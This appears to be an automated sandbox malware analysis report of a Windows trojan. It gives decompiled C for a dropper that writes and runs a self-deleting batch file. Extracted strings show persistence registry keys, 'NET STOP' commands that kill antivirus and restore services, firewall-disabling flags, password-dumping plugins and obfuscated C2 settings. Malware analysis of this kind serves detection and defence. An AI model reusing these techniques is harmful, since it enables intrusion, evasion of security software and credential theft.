0x00401418
0x0040141f
0x0040142f
0x00401435
0x00401438
0x00401438
0x00401418
0x0040143c
0x00401442
0x00401449
0x0040144f
0x0040145a
0x00401460
0x00401462
0x00401467
0x0040147c
0x00401480
0x00401483
0x0040148c
0x0040148f
0x00401490
0x00401498
0x0040149e
0x0040149e
0x004014a1
0x004014a6
0x004014a8
0x004014af
0x004014bf
0x004014c5
0x004014c8
0x004014c8
0x004014a8
0x004014cc
0x004014d2
0x004014d8
0x004014ef
0x004014f1
0x00401504
0x00401506
0x00401515
0x0040152e
0x00401530
0x0040153d
0x00401548
0x00401557
0x00401557
0x00401563
0x0040156f
0x00401575
0x00401584
0x00401588
0x0040159b
0x004015a2
0x004015a8
0x004015b1
0x004015b9
0x004015b9
0x004015c7
0x004015c7
0x004015d3
0x004015dd
0x004015f4
0x004015fe
0x0040160d
0x00401615
0x00401615
0x00401623
0x0040162a
0x00401630
0x00401639
0x00401641
0x00401650
0x00401652
0x00401659
0x00401663
0x00401670
0x0040146c
0x00401478
0x00401478
0x004013cf
0x004013db
0x004013db
0x004011ee
0x004011f8
0x004011f8

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004011C9
fopen.MSVCRT ref: 004011DC
fseek.MSVCRT ref: 00401225
getc.MSVCRT(00000000), ref: 0040122E
fseek.MSVCRT ref: 00401240
getc.MSVCRT(00000000), ref: 00401246
fseek.MSVCRT ref: 00401259
getc.MSVCRT(00000000), ref: 0040125C
fseek.MSVCRT ref: 00401273
getc.MSVCRT(00000000), ref: 00401276
fseek.MSVCRT ref: 00401288
getc.MSVCRT(00000000), ref: 0040128B
fseek.MSVCRT ref: 0040129E
getc.MSVCRT(00000000), ref: 004012A4
GetSystemDirectoryA.KERNEL32 ref: 004012C1

Strings

\lncom.exe, xrefs: 00401320
open, xrefs: 004014E8, 004014FD
\lncom_., xrefs: 0040134E

Memory Dump Source

Source File: 00000000.00000002.357985851.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357979479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.357991655.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7b8wRbnmKu.jbxd

Similarity

API ID: fseekgetc$DirectoryFileModuleNameSystemfopen
String ID: \lncom.exe$\lncom_.$open
API String ID: 1208315714-94107862
Opcode ID: 9c606e5bb497700182063aec2cca46cbec0c8ffb51c694d28e0526952796564c
Instruction ID: 101c02b18243e6fdb3ce9b81772a4c9269db9356f0974833fe69b5fb44ff080d
Opcode Fuzzy Hash: 9c606e5bb497700182063aec2cca46cbec0c8ffb51c694d28e0526952796564c
Instruction Fuzzy Hash: 78D168316407441BD728CA389C42BAB77D6EFC4330F14432EFA5AAB2E1DEB5A909C755

Uniqueness

Uniqueness Score: -1.00%

Function 004016A0 Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 107
processfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 54%

			_entry_(void* __eflags) {
				char _v260;
				char _v520;
				char _v780;
				struct _IO_FILE* _t26;
				CHAR* _t37;
				unsigned int _t39;
				signed int _t40;
				char* _t57;
				void* _t78;
				struct _IO_FILE* _t80;

				E00401680(0x3b8);
				E00401680(0x3b8);
				_push("jpg");
				_push("jpg");
				if(E004011B0() == 2) {
					L4:
					exit(1); // executed
					return __imp__??2@YAPAXI@Z();
				}
				GetModuleFileNameA(0,  &_v260, 0x104);
				_t37 =  &_v780;
				GetShortPathNameA( &_v260, _t37, 0x104); // executed
				asm("repne scasb");
				_t39 =  !(_t37 | 0xffffffff);
				_t78 =  &_v780 - _t39;
				_t57 =  &_v520;
				_t40 = _t39 >> 2;
				memcpy(_t78 + _t40 + _t40, _t78, memcpy( &_v520, _t78, _t40 << 2) & 0x00000003);
				asm("repne scasb");
				asm("repne scasb");
				memcpy(_t57 - 1, 0x4010ac, 0 << 2);
				memcpy(0x1b5c806, 0x4010ac, 0);
				_t26 = fopen(_t57, 0x4010b4); // executed
				_t80 = _t26;
				if(_t80 != 0) {
					fprintf(_t80, ":1");
					_push(0x22);
					_push( &_v780);
					_push(0x22);
					fprintf(_t80, "del %c%s%c\n");
					_push(0x22);
					_push( &_v780);
					_push(0x22);
					fprintf(_t80, "if exist  %c%s%c goto 1\n");
					_push(0x25);
					fprintf(_t80, "del %c0\n");
					fclose(_t80); // executed
					WinExec( &_v520, 0); // executed
					goto L4;
				}
				return _t26;
			}

0x004016ad
0x004016b7
0x004016bc
0x004016c1
0x004016d1
0x004017d3
0x004017d5
0x004017e0
0x004017e0
0x004016e7
0x004016ed
0x004016ff
0x00401715
0x00401717
0x00401722
0x00401726
0x0040172d
0x0040173a
0x00401744
0x00401753
0x0040175b
0x00401762
0x00401764
0x0040176d
0x00401772
0x0040178b
0x00401791
0x00401793
0x00401794
0x0040179c
0x004017a2
0x004017a4
0x004017a5
0x004017ad
0x004017af
0x004017b7
0x004017ba
0x004017cd
0x00000000
0x004017cd
0x0040177c

APIs

Part of subcall function 004011B0: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004011C9
Part of subcall function 004011B0: fopen.MSVCRT ref: 004011DC

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004016E7
GetShortPathNameA.KERNEL32 ref: 004016FF
fopen.MSVCRT ref: 00401764
fprintf.MSVCRT ref: 0040178B
fprintf.MSVCRT ref: 0040179C
fprintf.MSVCRT ref: 004017AD
fprintf.MSVCRT ref: 004017B7
fclose.MSVCRT ref: 004017BA
WinExec.KERNEL32 ref: 004017CD
exit.KERNELBASE ref: 004017D5

Strings

del %c%s%c, xrefs: 00401796
:1, xrefs: 00401785
jpg, xrefs: 004016BC, 004016C1
if exist %c%s%c goto 1, xrefs: 004017A7
del %c0, xrefs: 004017B1
.bat, xrefs: 0040173C

Memory Dump Source

Source File: 00000000.00000002.357985851.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357979479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.357991655.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7b8wRbnmKu.jbxd

Similarity

API ID: fprintf$Name$FileModulefopen$ExecPathShortexitfclose
String ID: .bat$:1$del %c%s%c$del %c0$if exist %c%s%c goto 1$jpg
API String ID: 1156393534-1702155742
Opcode ID: 4ded0a2c522a573597095b6c2eccb4b380174adc61edc6e727e933de06220b20
Instruction ID: be81149b051e5d8100a3523869d4e77c52461b9b77ca219c5ff932cbc440552c
Opcode Fuzzy Hash: 4ded0a2c522a573597095b6c2eccb4b380174adc61edc6e727e933de06220b20
Instruction Fuzzy Hash: 0F31353264034467D334A7749C4BFEB3699EBC4711F004B2AF696B65E0DAF85A48829A

Uniqueness

Uniqueness Score: -1.00%

Function 004010C0 Relevance: 9.1, APIs: 6, Instructions: 87
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E004010C0(int* __eax) {
				signed int _t35;
				char _t41;
				int _t45;
				intOrPtr _t48;
				struct _IO_FILE* _t55;
				int* _t58;
				int* _t59;
				int* _t60;
				void* _t61;
				void* _t62;
				void* _t63;

				_t48 = 0;
				_push(0x2625a00);
				 *((intOrPtr*)(_t61 + 0x10)) = 0;
				L004017E0(); // executed
				_t60 = __eax;
				_t35 = fopen( *(_t61 + 0x38), 0x401048); // executed
				_t55 = _t35;
				_t62 = _t61 + 0xc;
				if(_t55 != 0) {
					if(( *(_t55 + 0xc) & 0x00000010) == 0) {
						_t59 = _t60;
						do {
							_t45 = getc(_t55); // executed
							 *_t59 = _t45;
							_t62 = _t62 + 4;
							_t59 =  &(_t59[1]);
						} while (( *(_t55 + 0xc) & 0x00000010) == 0);
					}
					rewind(_t55); // executed
					_t63 = _t62 + 4;
					if(( *(_t55 + 0xc) & 0x00000010) == 0) {
						_t12 =  &(_t60[2]); // 0x8
						_t58 = _t12;
						do {
							getc(_t55); // executed
							_t41 =  *((char*)(_t63 + 0x1c));
							_t63 = _t63 + 4;
							if( *((intOrPtr*)(_t58 - 8)) == _t41 &&  *((intOrPtr*)(_t58 - 4)) ==  *((char*)(_t63 + 0x1c)) &&  *_t58 ==  *((char*)(_t63 + 0x20)) && _t58[1] ==  *((char*)(_t63 + 0x24)) && _t58[2] ==  *((char*)(_t63 + 0x28)) && _t58[3] ==  *((char*)(_t63 + 0x2c)) && _t58[4] ==  *((char*)(_t63 + 0x30)) && _t58[5] ==  *((char*)(_t63 + 0x34))) {
								 *((intOrPtr*)(_t63 + 0x10)) = _t48;
							}
							_t48 = _t48 + 1;
							_t58 =  &(_t58[1]);
						} while (( *(_t55 + 0xc) & 0x00000010) == 0);
					}
					fclose(_t55); // executed
					return  *((intOrPtr*)(_t63 + 0x14));
				} else {
					return _t35 | 0xffffffff;
				}
			}

0x004010c4
0x004010c6
0x004010cb
0x004010cf
0x004010d4
0x004010e0
0x004010e6
0x004010e8
0x004010ed
0x004010fd
0x004010ff
0x00401101
0x00401102
0x00401108
0x0040110d
0x00401110
0x00401113
0x00401101
0x00401118
0x00401121
0x00401126
0x00401128
0x00401128
0x0040112b
0x0040112c
0x00401132
0x0040113a
0x0040113f
0x00401186
0x00401186
0x0040118d
0x0040118e
0x00401191
0x0040112b
0x00401196
0x004011a8
0x004010f1
0x004010f6
0x004010f6

APIs

??2@YAPAXI@Z.MSVCRT ref: 004010CF
fopen.MSVCRT ref: 004010E0
getc.MSVCRT(00000000,?,00000037,00000038,?), ref: 00401102
rewind.MSVCRT ref: 00401118
getc.MSVCRT(00000000,?,00000037,00000038,?), ref: 0040112C
fclose.MSVCRT ref: 00401196

Memory Dump Source

Source File: 00000000.00000002.357985851.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357979479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.357991655.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7b8wRbnmKu.jbxd

Similarity

API ID: getc$??2@fclosefopenrewind
String ID:
API String ID: 2099994351-0
Opcode ID: a55d1c54c5fcaf1d497feee243d3e4191cf3d93f2b78312697c9969116fbace9
Instruction ID: ac5987a753cad537f52ce3613b1ebba81143f572ff8f953ee723a99b562e2055
Opcode Fuzzy Hash: a55d1c54c5fcaf1d497feee243d3e4191cf3d93f2b78312697c9969116fbace9
Instruction Fuzzy Hash: 0E2139318087815FD7248F24989043BBBF0EE89326B04C93FF9E6667A1D3389946CF95

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: lncom.exePID: 7348, Parent PID: 5676COMMON

Execution Graph

Execution Coverage:	4.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	9.9%
Total number of Nodes:	1120
Total number of Limit Nodes:	63

Executed Functions

Function 00494D78 Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 151
registrystringlibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,00401173,00400000,?,00000105,?,00401214), ref: 00494D94
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F003F,?,00000000,?,00000105,?,?,?,00401173,00400000,?,00000105), ref: 00494DB2
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F003F,?,80000001,Software\Borland\Locales,00000000,000F003F,?,00000000,?,00000105), ref: 00494DD0
RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,00494E44,?,80000001,Software\Borland\Locales,00000000,000F003F,?,00000000,?), ref: 00494E0A
RegQueryValueExA.ADVAPI32(?,00494F70,00000000,00000000,?,?,?,00000000,00000000,00000000,?,?,00000000,00494E44,?,80000001), ref: 00494E28
RegCloseKey.ADVAPI32(?,00494E4B,00000000,?,?,00000000,00494E44,?,80000001,Software\Borland\Locales,00000000,000F003F,?,00000000,?,00000105), ref: 00494E3E
lstrcpy.KERNEL32(?,?), ref: 00494E56
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,80000001,Software\Borland\Delphi\Locales,00000000,000F003F,?,80000001,Software\Borland\Locales,00000000,000F003F,?,00000000), ref: 00494E63
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,80000001,Software\Borland\Delphi\Locales,00000000,000F003F,?,80000001,Software\Borland\Locales,00000000,000F003F,?), ref: 00494E69
lstrlen.KERNEL32(00000000,00000000,00000003,?,00000005,?,?,80000001,Software\Borland\Delphi\Locales,00000000,000F003F,?,80000001,Software\Borland\Locales,00000000,000F003F), ref: 00494E94
lstrcpy.KERNEL32(00000000,?), ref: 00494ECB
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,?,00000000,00000000,00000003,?,00000005,?,?,80000001,Software\Borland\Delphi\Locales,00000000,000F003F), ref: 00494EDB
lstrcpy.KERNEL32(00000000,?), ref: 00494EF1
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,?,00000000,00000000,00000003,?,00000005,?,?,80000001,Software\Borland\Delphi\Locales,00000000,000F003F), ref: 00494F01
lstrcpy.KERNEL32(00000000,?), ref: 00494F15
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,?,00000000,00000000,00000002,00000000,?,00000000,00000000,00000003,?,00000005,?), ref: 00494F25

Strings

Software\Borland\Locales, xrefs: 00494DA8
Software\Borland\Delphi\Locales, xrefs: 00494DC6
., xrefs: 00494EA6

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: lstrcpy$LibraryLoad$LocaleOpenQueryValue$CloseFileInfoModuleNameThreadlstrlen
String ID: .$Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 466793542-3917250287
Opcode ID: d5d70648b2efc8b96b19c1e714dbc337efd83584e2318f5b29868002c5f8fea5
Instruction ID: c2d290de6c5bbb4826b4a67dd71abb419380dc309b3377c3ac87156bec448e9f
Opcode Fuzzy Hash: d5d70648b2efc8b96b19c1e714dbc337efd83584e2318f5b29868002c5f8fea5
Instruction Fuzzy Hash: B541617190025D7AEF21D6E4CC46FEF7BAC9B44744F4000A7B604E6182DAB89E45CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0046D840 Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 387
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

RegisterAutomation, xrefs: 0046DC12
vcltest3.dll, xrefs: 0046DBF1

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID:
String ID: RegisterAutomation$vcltest3.dll
API String ID: 0-2963190186
Opcode ID: d14ad83a99c743823946f86c8829a80beb1fafc0564d68af95a3f5e0106aee00
Instruction ID: efccb098a8d309f350d608f85c02ba4131daa711f18dcbb9136de7cc87cd0b04
Opcode Fuzzy Hash: d14ad83a99c743823946f86c8829a80beb1fafc0564d68af95a3f5e0106aee00
Instruction Fuzzy Hash: 28E15934F00605EFDB00DBA9C585E9EB7E5EF18310F2481A6E8059B396E739ED41DB4A

Uniqueness

Uniqueness Score: -1.00%

Function 00418B3C Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 232libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll), ref: 00418E5D
GetProcAddress.KERNEL32(00000000,RegisterServiceProcess), ref: 00418E85
GetCurrentProcessId.KERNEL32(00000001,00000000,RegisterServiceProcess), ref: 00418EA1

Strings

RegisterServiceProcess, xrefs: 00418E77
kernel32.dll, xrefs: 00418E58

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: AddressCurrentLibraryLoadProcProcess
String ID: RegisterServiceProcess$kernel32.dll
API String ID: 353374858-4020013434
Opcode ID: 536b11dc6b51f7ca3e3412e0db3b67dae636a0d7d1762d23842828ea98e98a09
Instruction ID: 85dd3241dd39632adeb1822e5fcbdd35386ba5ecc101fe9cefc4b0463f87b7fe
Opcode Fuzzy Hash: 536b11dc6b51f7ca3e3412e0db3b67dae636a0d7d1762d23842828ea98e98a09
Instruction Fuzzy Hash: CFA10E35E01108EBDB01EBDDC56279CF774FF04309F2450AAB925F6392CA789B11AB19

Uniqueness

Uniqueness Score: -1.00%

Function 004327B8 Relevance: 3.0, APIs: 2, Instructions: 40nativeCOMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,00000000), ref: 004327C4
NtdllDefWindowProc_A.NTDLL(?,?,?,?,?,00000000), ref: 004327EE

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Window$LongNtdllProc_
String ID:
API String ID: 2044268144-0
Opcode ID: a89113c9ddec40756c6ddd612917673df00ac06891bcd8c944805ed112004bdf
Instruction ID: b0afe39756b961c8e8c50571397fb9ffaf4aa97a417af1cd2bc0017b983da50a
Opcode Fuzzy Hash: a89113c9ddec40756c6ddd612917673df00ac06891bcd8c944805ed112004bdf
Instruction Fuzzy Hash: CF01A575A00209EFCB40DF98C9819DEBBF8FB08310F104556F915E7340D770AE519BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00481F40 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(00000000,00000000,0000000A), ref: 00481F62

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: FindResource
String ID:
API String ID: 1635176832-0
Opcode ID: 92b8ecf1c7f4cd1e65a5de35c27bf315241addc2f9ea9e01698b2985517b41fc
Instruction ID: eaa5829bee9b56121a832952090e171414de8f5475571e2c2aa36c41e0cc0347
Opcode Fuzzy Hash: 92b8ecf1c7f4cd1e65a5de35c27bf315241addc2f9ea9e01698b2985517b41fc
Instruction Fuzzy Hash: FD01D4313043006BD711EF569C92D6EB7ADDB89718711057BF604D7251DA699C019318

Uniqueness

Uniqueness Score: -1.00%

Function 0046D7B8 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 0046D7E2

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: NtdllProc_Window
String ID:
API String ID: 4255912815-0
Opcode ID: 9b19343ccbe0b9cfab5af8c098d362bf363d43c2f9c928aebf5d8c5864effde2
Instruction ID: c44ea16c17aa19ecd998bb65c80e007701d271a1899bae8439ffd0feb387e958
Opcode Fuzzy Hash: 9b19343ccbe0b9cfab5af8c098d362bf363d43c2f9c928aebf5d8c5864effde2
Instruction Fuzzy Hash: 1EF0CB79205609AF8740DF9DC688D49FBE8EB4C260B058591B988CB321D234FD808F90

Uniqueness

Uniqueness Score: -1.00%

Function 004193F0 Relevance: 212.8, APIs: 18, Strings: 102, Instructions: 2766
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(00000000,000000FF,?,?,?,?,00000001), ref: 004195CD
GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,000000FF,?,?,?,?,00000001), ref: 004195DE
GetWindowsDirectoryA.KERNEL32(?,00000104,?,00000104,00000000,000000FF,?,?,?,?,00000001), ref: 004195EF

Part of subcall function 004925A0: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,00000000,0046EA74,?,0040B22F), ref: 004925BD

Sleep.KERNEL32(000007D0,?,00000104,?,00000104,00000000,000000FF,?,?,?,?,00000001), ref: 004197D5

Part of subcall function 00410570: GetVersionExA.KERNEL32(00000094), ref: 0041059D
Part of subcall function 00410570: WinExec.KERNEL32(NET STOP srservice,00000000), ref: 004106BE

Part of subcall function 0040E7D0: GetVersionExA.KERNEL32(00000094), ref: 0040E7F7
Part of subcall function 0040E7D0: WinExec.KERNEL32(NET STOP navapsvc,00000000), ref: 0040E931

Part of subcall function 00410A18: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00410A2F

GetWindowsDirectoryA.KERNEL32(?,00000104,?,00000104,?,00000104,00000000,000000FF,?,?,?,?,00000001), ref: 0041B35D

Part of subcall function 0040D79C: FindWindowA.USER32(00000000,00000000), ref: 0040D7DB

Strings

3\, xrefs: 004199D1
ktd32.atm, xrefs: 0041A825
SOFTWARE\Microsoft\Windows NT Script Host\Microsoft DxDiag\WinSettings, xrefs: 0041B1C8
SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\, xrefs: 0041C43A
SOFTWARE\Microsoft\Windows NT Script Host\Microsoft DxDiag\WinSettings, xrefs: 00419850
Software\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}, xrefs: 0041B2F4
Online_List, xrefs: 0041BEB0
\system32\fservice.exe, xrefs: 0041960C
Hata, xrefs: 0041C8A7
Pplugin1.dll, xrefs: 0041A45C
winp9.exe, xrefs: 0041ACF9
Kurban_Ismi, xrefs: 0041A2B9
Windows services , xrefs: 0041B7BA
ICQ_UIN_atm=xnt/on,hq/bnl , xrefs: 0041B968
Online_List_atm=iuuq;..vvv/xntsrhud/bnl.bfh,cho.qsns`u/bfh , xrefs: 0041BA08
\system\sservice.exe, xrefs: 0041C255
C:\, xrefs: 00419E5B
Pplugin9.dat, xrefs: 0041AF63
Kurban_Ismi_atm=whbuhl , xrefs: 0041B9B8
Windows services , xrefs: 004197E8
Pplugin10xa.exe, xrefs: 0041AB19
Error, xrefs: 0041C887
Bulas, xrefs: 0041B21E
Port, xrefs: 0041BF31
XP_FW_Disable, xrefs: 0041993A
\system\sservice.exe, xrefs: 0041B570
Sifre, xrefs: 00419F03
Pplugin9.dat, xrefs: 0041A9C3
ICQ_UIN, xrefs: 00419FD5
ICQ_UIN2, xrefs: 0041A08E
Mail, xrefs: 0041BE2F
Hata, xrefs: 0041C7EC
Pplugin3.dll, xrefs: 0041A570
V1.9:Fix-18, xrefs: 0041B065
};\, xrefs: 0041C817
Mail_atm=clncdsl`oAx`inn/bnl , xrefs: 0041B9E0
FW_KILL, xrefs: 0041BB29
KSil, xrefs: 0041C925
SOFTWARE\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}\, xrefs: 0041C5C4
ICQ_UIN2, xrefs: 0041BD2D
\system\sservice.exe, xrefs: 004196A2
Pplugin4.exe /stext , xrefs: 0041A70E
\services.exe, xrefs: 0041B37D
Shell, xrefs: 0041C73E
winrar.exe, xrefs: 0041AFED
Port_atm=4001 , xrefs: 0041BA30
Windows services , xrefs: 0041B6D6
Kurban_Ismi, xrefs: 0041BDAE
XP_SYS_atm=0, xrefs: 0041B940
Sifre_atm=032 , xrefs: 0041BA58
Bulas, xrefs: 0041B87E
\system32\fservice.exe, xrefs: 0041C1CA
Explorer.exe , xrefs: 0041C723
FW_KILL, xrefs: 00419A49
eimsn.exe, xrefs: 0041AED9
Pplugin10xa.exe /stext , xrefs: 0041AC2D
LanNotifie_atm=0, xrefs: 004194ED
Tport, xrefs: 00419B6C
SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run, xrefs: 0041C3F8
Pplugin9.dat, xrefs: 0041AD83
StubPath, xrefs: 0041C608
FW_KILL_atm=0, xrefs: 0041B8F0
Software\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}, xrefs: 0041C50C
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\, xrefs: 0041C6CF
Windows services , xrefs: 0041B76F
\, xrefs: 00419408
SOFTWARE\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}, xrefs: 0041C582
